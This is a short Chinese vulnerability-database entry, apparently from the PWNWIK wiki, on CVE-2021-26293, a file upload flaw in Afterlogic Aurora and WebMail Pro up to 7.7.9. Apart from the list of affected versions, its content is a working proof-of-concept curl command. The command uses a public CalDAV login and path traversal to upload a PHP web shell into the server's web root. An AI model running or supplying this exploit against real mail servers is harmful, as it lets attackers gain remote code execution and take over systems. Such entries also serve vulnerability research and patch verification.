Loading
0

CVE-2021-26293 Afterlogic Aurora & WebMail Pro 文件上传漏洞

PWNWIK.COM==免费、自由、人人可编辑的漏洞库

,

影响版本

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

POC

curl -T shell.php -u 'email protected:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

PWNWIK.COM